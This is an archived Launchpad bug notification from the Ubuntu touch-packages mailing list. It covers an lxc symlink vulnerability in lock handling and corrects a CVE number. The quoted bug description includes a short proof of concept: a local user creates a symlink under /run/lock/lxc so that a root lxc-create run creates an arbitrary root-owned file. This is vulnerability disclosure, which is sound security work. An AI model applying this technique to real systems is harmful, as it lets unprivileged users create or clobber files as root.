← Back to team overview

touch-packages team mailing list archive

  1. touch-packages team
  2. Mailing list archive
  3. Message #91623

[Bug 1470842] Re: lxc tools lock handling vulnerable to symlink attack

  Thread PreviousDate PreviousThread Next 
It is worth noting that I typoed the CVE ID in the changelog.
CVE-2015-1131 should have been CVE-2015-1331.

** CVE removed: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1131

** CVE added: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1131

** CVE removed: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1334

** CVE removed: http://www.cve.mitre.org/cgi-
bin/cvename.cgi?name=2015-1131

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1470842

Title:
  lxc tools lock handling vulnerable to symlink attack

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  During LXC security analysis (see [1]) it was found, that when lxc
  tools, e.g. lxc-info, are run as user root, a symlink attack on
  /run/lock/lxc can be used to create arbitrary files as the root user.
  The malicious user has to set up the symlink attack before
  /run/lock/lxc/ exists, which is only possible prior to the
  administrator creating the first container or automatic startup
  starting after boot starting one.

  PoC:

  $ mkdir -p /run/lock/lxc/var/lib/lxc
  $ ln -s /test /run/lock/lxc/var/lib/lxc/somename
  $ stat /test
  stat: cannot stat ‘/test’: No such file or directory
  $ sudo lxc-create --name somename --template download # An admin would run this command
  ...
  Distribution: ubuntu
  Release: trusty
  Architecture: amd64
  ...
  $ stat /test
    File: ‘/test’
    Size: 0         	Blocks: 0          IO Block: 4096   regular empty file
  Device: fd01h/64769d	Inode: 52559       Links: 1
  Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
  Access: 2015-07-02 10:40:55.703646793 -0500
  Modify: 2015-07-02 10:40:55.703646793 -0500
  Change: 2015-07-02 10:40:55.703646793 -0500
   Birth: -

  # lsb_release -rd
  Description:    Ubuntu 14.04.2 LTS
  Release:        14.04

  # apt-cache policy lxc
  lxc:
    Installed: 1.0.7-0ubuntu0.1
    Candidate: 1.0.7-0ubuntu0.1
    Version table:
   *** 1.0.7-0ubuntu0.1 0
          500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       1.0.3-0ubuntu3 0
          500 http://archivexxx/ubuntu/ trusty/main amd64 Packages

  [1] https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1470842/+subscriptions
  Thread PreviousDate PreviousThread Next